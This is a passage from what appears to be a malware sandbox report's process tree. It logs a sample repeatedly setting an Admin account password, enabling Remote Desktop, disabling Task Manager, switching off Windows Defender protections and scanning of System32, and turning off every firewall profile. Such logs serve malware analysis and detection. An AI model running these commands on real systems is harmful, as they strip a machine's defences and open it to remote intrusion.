        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        16⤵
        
        PID:5324
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        16⤵
        
        PID:4624
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        16⤵
        
        PID:1260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        16⤵
        
        PID:3520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        16⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        16⤵
        
        PID:5444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        16⤵
        
        PID:5668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        16⤵
        
        PID:5828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        16⤵
        
        PID:6216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        16⤵
        
        PID:7152
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        16⤵
        Modifies Windows Firewall
        
        PID:408
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        16⤵
        
        PID:7476
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        16⤵
        Modifies Windows Firewall
        
        PID:6252
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        16⤵
        Modifies Windows Firewall
        
        PID:7432
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        16⤵
        
        PID:5804
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        16⤵
        
        PID:5740
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        16⤵
        
        PID:6276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        16⤵
        
        PID:5976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        16⤵
        
        PID:4104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        16⤵
        
        PID:7408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        16⤵
        
        PID:7904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        16⤵
        
        PID:10224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
        16⤵
        
        PID:9736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
        16⤵
        
        PID:8548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'Exclusions' -Value 'C:\Windows\System32'"
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2512
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        14⤵
        
        PID:5372
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        15⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        14⤵
        
        PID:5580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        14⤵
        
        PID:2852
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        14⤵
        
        PID:5524
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        14⤵
        
        PID:5620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        14⤵
        
        PID:6168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        14⤵
        
        PID:6296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        14⤵
        
        PID:4216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        14⤵
        
        PID:5124
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        14⤵
        
        PID:6156
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        14⤵
        
        PID:6652
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        14⤵
        Modifies Windows Firewall
        
        PID:4944
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        14⤵
        
        PID:5604
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        14⤵
        
        PID:5700
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        14⤵
        
        PID:7660
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        14⤵
        
        PID:5496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        14⤵
        
        PID:6064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        14⤵
        
        PID:8044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        14⤵
        
        PID:7340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        14⤵
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        14⤵
        
        PID:6460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        14⤵
        
        PID:8492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1"
        14⤵
        
        PID:5464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
        14⤵
        
        PID:1188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
        14⤵
        
        PID:9824
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        12⤵
        
        PID:5916
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        13⤵
        
        PID:5928
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        12⤵
        
        PID:2288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        12⤵
        
        PID:2972
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        12⤵
        
        PID:5348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        12⤵
        
        PID:5380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        12⤵
        
        PID:6520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        12⤵
        
        PID:6340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        12⤵
        
        PID:1260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        12⤵
        
        PID:6684
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        12⤵
        
        PID:7380
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        12⤵
        
        PID:5716
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        12⤵
        
        PID:7380
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        12⤵
        
        PID:6156
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        12⤵
        
        PID:5536
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        12⤵
        
        PID:3320
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        12⤵
        
        PID:7640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        12⤵
        
        PID:7768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        12⤵
        
        PID:7216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        12⤵
        
        PID:7796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        12⤵
        
        PID:8224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        12⤵
        
        PID:9840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1"
        12⤵
        
        PID:5952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
        12⤵
        
        PID:8564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
        12⤵
        
        PID:9980
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        10⤵
        
        PID:5404
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        11⤵
        
        PID:5416
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        10⤵
        
        PID:5480
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        10⤵
        
        PID:5584
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        10⤵
        
        PID:5596
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:5612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        10⤵
        
        PID:6740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        10⤵
        
        PID:6660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        10⤵
        
        PID:6928
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        10⤵
        Modifies Windows Firewall
        
        PID:6304
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        10⤵
        
        PID:3500
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        10⤵
        
        PID:7732
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        10⤵
        
        PID:5328
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        10⤵
        
        PID:7992
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        10⤵
        
        PID:7616
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        10⤵
        
        PID:6532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        10⤵
        
        PID:6840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        10⤵
        
        PID:7868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        10⤵
        
        PID:6616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        10⤵
        
        PID:7056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        10⤵
        
        PID:7492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1"
        10⤵
        
        PID:7332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
        10⤵
        
        PID:3768
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        8⤵
        
        PID:4984
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        9⤵
        
        PID:4216
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        8⤵
        
        PID:5160
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:5184
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        8⤵
        
        PID:5212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:5232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6504
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        8⤵
        
        PID:6880
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        8⤵
        Modifies Windows Firewall
        
        PID:6836
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        8⤵
        
        PID:7044
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        8⤵
        
        PID:2704
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        8⤵
        
        PID:7468
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        8⤵
        
        PID:8180
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        8⤵
        
        PID:7768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        8⤵
        
        PID:3040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        8⤵
        
        PID:5096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        8⤵
        
        PID:8176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        8⤵
        
        PID:8380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        8⤵
        
        PID:5852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        8⤵
        
        PID:7836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1"
        8⤵
        
        PID:7576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
        8⤵
        
        PID:5380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
        8⤵
        
        PID:6860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'Exclusions' -Value 'C:\Windows\System32'"
        8⤵
        
        PID:5692
      - C:\Windows\system32\net.exe
        
        net user Admin D34TH
        6⤵
        
        PID:2952
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        7⤵
        
        PID:3272
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        6⤵
        
        PID:1312
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:3564
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        6⤵
        
        PID:4300
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3832
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5108
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5652
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5336
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2972
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        6⤵
        
        PID:6456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        6⤵
        
        PID:1632
      - C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        
        PID:6632
      - C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        6⤵
        Modifies Windows Firewall
        
        PID:6052
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        
        PID:4404
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        6⤵
        
        PID:5200
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        6⤵
        
        PID:5828
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        6⤵
        
        PID:6452
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        6⤵
        
        PID:5964
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        6⤵
        
        PID:4548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        6⤵
        
        PID:7112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        6⤵
        
        PID:2996
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        6⤵
        
        PID:7180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4588
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        6⤵
        
        PID:6788
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'MRU' -Value '00000000000000000000000000000000'"
        6⤵
        
        PID:9252
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'DisableRealtimeMonitoring' -Value 1"
        6⤵
        
        PID:9324
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name 'Exclusions' -Value 'C:\Windows\System32'"
        6⤵
        
        PID:10144
  - - C:\Windows\system32\net.exe
      net user Admin D34TH
      4⤵
      PID:1144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        5⤵
        
        PID:4764
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
      4⤵
      PID:2952
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
      4⤵
      PID:4308
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
      4⤵
